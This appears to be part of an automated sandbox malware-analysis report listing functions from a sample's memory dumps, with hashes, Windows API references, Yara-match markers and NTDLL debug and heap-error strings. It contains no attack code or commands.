Instruction ID: e68336ecf97fcbff1cce52d5eab911d0c0d253976a6ab71543f56f2ca0e2158f
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 6CD012752002146BD710EB99CC85ED7776CEF44760F154459BA5C5B242C530F55086E0

Uniqueness

Uniqueness Score: -1.00%

Function 019E99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019E99AA

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 533bae7c0f38fa21d4086203dcaeedaecb3d5cd4b3af6a4ffbd9264751f4bd3d
Instruction ID: 584a51a6c86ed0791a0cbb28a00dcd7c95c871de469cae6b4a94e7b8f0246775
Opcode Fuzzy Hash: 533bae7c0f38fa21d4086203dcaeedaecb3d5cd4b3af6a4ffbd9264751f4bd3d
Instruction Fuzzy Hash: F29002A174110452D10061994414B064085E7E1341F52C019E2094554DC659CC527266

Uniqueness

Uniqueness Score: -1.00%

Function 019E95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019E95DA

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 531e678c946ab69c51572a077ffbbaac2c9af758f6e9f1695948f765791fc734
Instruction ID: 65a57c730bb93776a47d27a38651bba3b0d6605563f2f26718db8b72155624ac
Opcode Fuzzy Hash: 531e678c946ab69c51572a077ffbbaac2c9af758f6e9f1695948f765791fc734
Instruction Fuzzy Hash: CA9002A160210013410571994414716808AA7E0241B52C025E2044590DC56588917265

Uniqueness

Uniqueness Score: -1.00%

Function 019E9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019E991A

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 42c566ecf3feccb679baa8406b00a186f20d58d626ec2d02e8d77ecbc42f33da
Instruction ID: 70919bc3d6f3b35487f5da3a1203a6347b7df5251ff8354d6d1bbd2531179261
Opcode Fuzzy Hash: 42c566ecf3feccb679baa8406b00a186f20d58d626ec2d02e8d77ecbc42f33da
Instruction Fuzzy Hash: 149002B160110412D140719944047464085A7D0341F52C015A6094554EC6998DD577A5

Uniqueness

Uniqueness Score: -1.00%

Function 019E9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019E954A

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: af394b673738f228806e3325dccb134c68860b0ca2e371e93503928a32bbefe1
Instruction ID: 2eda17d99ed2693bb4c268f73138bca783a53915f1f1d92a6d8b507bcc328281
Opcode Fuzzy Hash: af394b673738f228806e3325dccb134c68860b0ca2e371e93503928a32bbefe1
Instruction Fuzzy Hash: 8D900265611100130105A599070460740C6A7D5391352C025F2045550CD66188617261

Uniqueness

Uniqueness Score: -1.00%

Function 019E98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019E98FA

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5055e1b91ec41c558e8e8b7938516c3afff2d92a3d20a58699d7017cac47f403
Instruction ID: 15dab5cb71a66f072419d14b545cf5d6692bdf1791ce5f3ce20f97af9f1a38d1
Opcode Fuzzy Hash: 5055e1b91ec41c558e8e8b7938516c3afff2d92a3d20a58699d7017cac47f403
Instruction Fuzzy Hash: 81900261A0110512D10171994404716408AA7D0281F92C026A2054555ECA658992B271

Uniqueness

Uniqueness Score: -1.00%

Function 019E9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019E984A

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8df14da675a6c74c181218496305118d637a9a92433ef151909e0952ca5ef68f
Instruction ID: f5c08fd4785221686b1d53193baa32a268470542cfb5e4db872357551999692d
Opcode Fuzzy Hash: 8df14da675a6c74c181218496305118d637a9a92433ef151909e0952ca5ef68f
Instruction Fuzzy Hash: BC900261642141625545B19944046078086B7E0281792C016A2444950CC5669856F761

Uniqueness

Uniqueness Score: -1.00%

Function 019E9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019E986A

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4bdb18dffd5a0b939dc053aa063f666963ff9fdd9823520192ffb5154c2e8f0d
Instruction ID: bf4998f3795cbf782e421e2d05a003923865171afd2665b5d38f7d89b078b985
Opcode Fuzzy Hash: 4bdb18dffd5a0b939dc053aa063f666963ff9fdd9823520192ffb5154c2e8f0d
Instruction Fuzzy Hash: 2690027160110423D111619945047074089A7D0281F92C416A1454558DD6968952B261

Uniqueness

Uniqueness Score: -1.00%

Function 019E9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019E978A

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cf41e25a312c1e3c1089bed1c45c63277ad236c10fa2e0de91134f872bb15349
Instruction ID: ef085f96a656c457651e542e31482575c872953401f0c09c017ebd9c1e59ba6b
Opcode Fuzzy Hash: cf41e25a312c1e3c1089bed1c45c63277ad236c10fa2e0de91134f872bb15349
Instruction Fuzzy Hash: 6490026961310012D1807199540870A4085A7D1242F92D419A1045558CC95588697361

Uniqueness

Uniqueness Score: -1.00%

Function 019E97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019E97AA

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1de6e86c39118cdbe70126b3a3f00b03aadb26a432f2de4c943dbe6fab33c76b
Instruction ID: 256129c10c06f2da5455221514213396d92ead4bd71d2dfd2f63910c68f87e19
Opcode Fuzzy Hash: 1de6e86c39118cdbe70126b3a3f00b03aadb26a432f2de4c943dbe6fab33c76b
Instruction Fuzzy Hash: 0F90026170110013D140719954187068085F7E1341F52D015E1444554CD95588567362

Uniqueness

Uniqueness Score: -1.00%

Function 019E9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019E971A

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6e547fd1f27bf9d5bc6bece6787bab3e6107e6f848c6ee9c41f53d1143510306
Instruction ID: c136477115c89b8649f3cb81bb230b108a8423e776a78e23a527a74ff9ef68d3
Opcode Fuzzy Hash: 6e547fd1f27bf9d5bc6bece6787bab3e6107e6f848c6ee9c41f53d1143510306
Instruction Fuzzy Hash: A190027160110412D10065D954087464085A7E0341F52D015A6054555EC6A588917271

Uniqueness

Uniqueness Score: -1.00%

Function 019E96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019E96EA

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f906797e186bea307d25d104381cc09a7aac18be1799cf92856be1cad7d91cb7
Instruction ID: 50166be6e6405cb0a807931ae613230c1fac143ec70641f602cff7bd3194f08a
Opcode Fuzzy Hash: f906797e186bea307d25d104381cc09a7aac18be1799cf92856be1cad7d91cb7
Instruction Fuzzy Hash: 3E90027160118812D1106199840474A4085A7D0341F56C415A5454658DC6D588917261

Uniqueness

Uniqueness Score: -1.00%

Function 019E9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019E9A0A

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0a70ebfee35100449c5ce17d02cd98379d3ad110017e37e19c21315a6fcf9389
Instruction ID: b0d02f22a740215ca983481e6d1634144854cb5081acded1585e9980aa619991
Opcode Fuzzy Hash: 0a70ebfee35100449c5ce17d02cd98379d3ad110017e37e19c21315a6fcf9389
Instruction Fuzzy Hash: BD90027160150412D1006199481470B4085A7D0342F52C015A2194555DC665885176B1

Uniqueness

Uniqueness Score: -1.00%

Function 019E9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019E9A2A

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0807d75b2ff3a26a074ea2c3db35fa9593eb1536e499141cb957734d888fbc81
Instruction ID: 3a93ec0754f4304903f9414bd30257f0f0fa2ae0e61e07ea965c7cfaba3f41cf
Opcode Fuzzy Hash: 0807d75b2ff3a26a074ea2c3db35fa9593eb1536e499141cb957734d888fbc81
Instruction Fuzzy Hash: 5F900261A0110052414071A98844A068085BBE1251752C125A19C8550DC599886577A5

Uniqueness

Uniqueness Score: -1.00%

Function 019E9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019E9A5A

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3424594c360d4ea065630d247ff5e0cd8780bf3367e94c902c76628fcdc28679
Instruction ID: 640936c2d65c63a0698f29a806ed6a976ce36202625c349a3b4a2c1e5f0a4587
Opcode Fuzzy Hash: 3424594c360d4ea065630d247ff5e0cd8780bf3367e94c902c76628fcdc28679
Instruction Fuzzy Hash: DA90026161190052D20065A94C14B074085A7D0343F52C119A1184554CC95588617661

Uniqueness

Uniqueness Score: -1.00%

Function 019E9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019E966A

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ed41493b1a91efdae287e41f3c1b55219f013346595d90fcdbbeb537c3465bd9
Instruction ID: 007f5eaf3979301c0a3aa3cd58cba9483d6d4327d5946befe9ab4077f369219f
Opcode Fuzzy Hash: ed41493b1a91efdae287e41f3c1b55219f013346595d90fcdbbeb537c3465bd9
Instruction Fuzzy Hash: 0290027160110812D1807199440474A4085A7D1341F92C019A1055654DCA558A5977E1

Uniqueness

Uniqueness Score: -1.00%

Function 00409A90, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.496854769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
Instruction ID: 3804b4b6881f0f279124858c5e35b72bf87e4fbc11d5a75f000cd7e24852ad46
Opcode Fuzzy Hash: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
Instruction Fuzzy Hash: 64213CB2D4020857CB25D664AD42AEF737CEB54308F04017FE949A3182F7387E49CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A0A5, Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D
ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8

Memory Dump Source

Source File: 0000000A.00000002.496854769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateExitHeapProcess
String ID:
API String ID: 1054155344-0
Opcode ID: 7c50de567aa97ceeefa2302844ab8cab624988999e1e978816411563ad0ff048
Instruction ID: f5e09573baf34a1682226bb468c25b60be307c43510f50ff84d78b064f1856a5
Opcode Fuzzy Hash: 7c50de567aa97ceeefa2302844ab8cab624988999e1e978816411563ad0ff048
Instruction Fuzzy Hash: 95E022712102047BC234EF59CC80ED777AEEF88350F128559FA4CAB241C931EA5086F5

Uniqueness

Uniqueness Score: -1.00%

Function 00408373, Relevance: 1.7, APIs: 1, Instructions: 188threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 0000000A.00000002.496854769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 2c0a2ca4dad106a7bf3e9c2f82fb2b46f39ba3da42a9cf9eda73ca3f98a3e033
Instruction ID: 96decdc4cc71df3db0d9d2adbed65163e54b2172d22f5128ba2e8f9736df1c42
Opcode Fuzzy Hash: 2c0a2ca4dad106a7bf3e9c2f82fb2b46f39ba3da42a9cf9eda73ca3f98a3e033
Instruction Fuzzy Hash: D761D570A003096FD724DF64DC86BEBB7A8EF48704F00456EF549A7281EB746941CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004082E9, Relevance: 1.6, APIs: 1, Instructions: 60threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 0000000A.00000002.496854769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 7ce650a6fbd49b156628c1fbd6bfe38473dde5e331ad0fce2cad3913eea3c354
Instruction ID: 377386c9a72be11aecbcf9446ea01c247fefb8b048ebdcd1d246dfdb7205a75e
Opcode Fuzzy Hash: 7ce650a6fbd49b156628c1fbd6bfe38473dde5e331ad0fce2cad3913eea3c354
Instruction Fuzzy Hash: 2E014E31A402183AE720A6655C03FFF7B1C6B41F55F04411EFE04BA1C2E7E9550546E6

Uniqueness

Uniqueness Score: -1.00%

Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 0000000A.00000002.496854769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
Instruction ID: 99221eaed4bb2b1c73ef210b546efabe7985b039c1aa6a3efaa8447a865c7254
Opcode Fuzzy Hash: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
Instruction Fuzzy Hash: 7601D831A8031876E720A6959C43FFE772C6B40F54F044019FF04BA1C1D6A8691646EA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A205, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200

Memory Dump Source

Source File: 0000000A.00000002.496854769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 8b329062c87c042acb4bc54ae0498495b2ecf01a40344a30bb3eae7bc2bceee5
Instruction ID: dc7517b41b6932775ae173f6cf41775a9ac7159bf1d9a818c94ebf25f3b34fa2
Opcode Fuzzy Hash: 8b329062c87c042acb4bc54ae0498495b2ecf01a40344a30bb3eae7bc2bceee5
Instruction Fuzzy Hash: C1F0FFB52083846FCB10EF68DC81DD77BA9EF82310F14885EF89E57602C630E5248BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1C2, Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200

Memory Dump Source

Source File: 0000000A.00000002.496854769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: f78e5bcb106649487a9812e878f28000d255e4af63ce47fa8b864e8870093970
Instruction ID: 0fc7b311264e596ebeb308021fe95bf0a9ecc9d2a8eb2b6aacb77fa353b2e9b0
Opcode Fuzzy Hash: f78e5bcb106649487a9812e878f28000d255e4af63ce47fa8b864e8870093970
Instruction Fuzzy Hash: D3E0E5B02442145BCB14DF54DC81ED73BBCDF44260F148A59FC899B243C234E8018BB1

Uniqueness

Uniqueness Score: -1.00%

Function 0041A070, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D

Memory Dump Source

Source File: 0000000A.00000002.496854769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: ebe44f756a2289fd31ae4d5b5361048190c1dc89d00c79db85c43397b2838655
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 81E01AB12102086BD714DF59CC45EA777ACEF88750F018559B90857241C630E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A030, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D

Memory Dump Source

Source File: 0000000A.00000002.496854769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 0bf4e0d92ddb4de2ba6a166865ddf054dca1a4f918bcd24d9368b88a9b8aca1a
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: F1E012B1210208ABDB14EF99CC81EA777ACEF88664F158559BA086B242C630F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200

Memory Dump Source

Source File: 0000000A.00000002.496854769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 46e8f913edfca5d9b668009ee454d724baa27d6f5a7db77fbc9955010344b6d9
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 22E01AB12002086BDB10DF49CC85EE737ADEF88650F018555BA0C67241C934E8508BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A0B0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8

Memory Dump Source

Source File: 0000000A.00000002.496854769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: eb2c75e7f7166c4cf28644cd9339eacac336c717648a3dafe3de7fd5e277bb7f
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 4CD017726102187BD620EB99CC85FD777ACDF48BA0F0584A9BA5C6B242C531BA108AE1

Uniqueness

Uniqueness Score: -1.00%

Function 019E967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019E9694

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 441cb517c5bc47aa878b240d5a0c057cce5308181668a4d6932d01dc56907c56
Instruction ID: 1bd5b7e47a4adeaa97f5a81582286d8d4104d9c0b661a1aceb535dd931a9fca7
Opcode Fuzzy Hash: 441cb517c5bc47aa878b240d5a0c057cce5308181668a4d6932d01dc56907c56
Instruction Fuzzy Hash: 05B09B71D015C5D5D612D7A4860C717798477D0745F17C056D2060641B4778C0D1F6B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01A5B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01A5B314
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 01A5B39B
The instruction at %p tried to %s , xrefs: 01A5B4B6
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01A5B2DC
*** Inpage error in %ws:%s, xrefs: 01A5B418
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01A5B38F
The resource is owned shared by %d threads, xrefs: 01A5B37E
*** A stack buffer overrun occurred in %ws:%s, xrefs: 01A5B2F3
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01A5B53F
The critical section is owned by thread %p., xrefs: 01A5B3B9
*** An Access Violation occurred in %ws:%s, xrefs: 01A5B48F
The instruction at %p referenced memory at %p., xrefs: 01A5B432
*** enter .exr %p for the exception record, xrefs: 01A5B4F1
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01A5B305
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01A5B484
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01A5B47D
Go determine why that thread has not released the critical section., xrefs: 01A5B3C5
a NULL pointer, xrefs: 01A5B4E0
*** then kb to get the faulting stack, xrefs: 01A5B51C
The resource is owned exclusively by thread %p, xrefs: 01A5B374
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01A5B323
*** Resource timeout (%p) in %ws:%s, xrefs: 01A5B352
<unknown>, xrefs: 01A5B27E, 01A5B2D1, 01A5B350, 01A5B399, 01A5B417, 01A5B48E
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01A5B3D6
an invalid address, %p, xrefs: 01A5B4CF
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01A5B476
write to, xrefs: 01A5B4A6
*** enter .cxr %p for the context, xrefs: 01A5B50D
This failed because of error %Ix., xrefs: 01A5B446
read from, xrefs: 01A5B4AD, 01A5B4B2

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: d805264791dcad5846da1b7b23441192d842ee6009ffbe75bf93fc8112e903b4
Instruction ID: b6d4a34d2bdf48e79a6fcdd701e3c8e5167667324bc05dda5e5e4707f41565ea
Opcode Fuzzy Hash: d805264791dcad5846da1b7b23441192d842ee6009ffbe75bf93fc8112e903b4
Instruction Fuzzy Hash: 9B81F175A04200FFDF26AB4E9D86E7B3F76AF96A62F444048F9082B512D2718551CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 01A61C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 01A61C30, 01A61CF7, 01A61D42, 01A61D8B, 01A61DD4, 01A61E25, 01A61E6D
heap_failure_lfh_bitmap_mismatch, xrefs: 01A61CD7
Parameter3: %p, xrefs: 01A61DEE
heap_failure_generic, xrefs: 01A61C7C
heap_failure_entry_corruption, xrefs: 01A61C83
Parameter1: %p, xrefs: 01A61D5C
heap_failure_block_not_busy, xrefs: 01A61CA6
heap_failure_usage_after_free, xrefs: 01A61CBB
HEAP: , xrefs: 01A61C16, 01A61C3D, 01A61D04, 01A61D4F, 01A61D98, 01A61DE1, 01A61E32, 01A61E7A
heap_failure_internal, xrefs: 01A61C6E
heap_failure_listentry_corruption, xrefs: 01A61CD0
heap_failure_buffer_overrun, xrefs: 01A61C98
Stack trace available at %p, xrefs: 01A61E86
Parameter2: %p, xrefs: 01A61DA5
heap_failure_cross_heap_operation, xrefs: 01A61CC2
Heap error detected at %p (heap handle %p), xrefs: 01A61C50
heap_failure_invalid_argument, xrefs: 01A61CAD
heap_failure_virtual_block_corruption, xrefs: 01A61C91
heap_failure_freelists_corruption, xrefs: 01A61CC9
heap_failure_invalid_allocation_type, xrefs: 01A61CB4
heap_failure_multiple_entries_corruption, xrefs: 01A61C8A
heap_failure_unknown, xrefs: 01A61C75
heap_failure_buffer_underrun, xrefs: 01A61C9F
Last known valid blocks: before - %p, after - %p, xrefs: 01A61E45
Error code: %d - %s, xrefs: 01A61D12

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: d076754bba49c1947adb61f51324d0ace096e7dcb85459843de2a47a5dc92a4b
Instruction ID: 082d1bfd6d721fdc2d5247c1e214906ef9c10702caf10634a20f936c871131bc
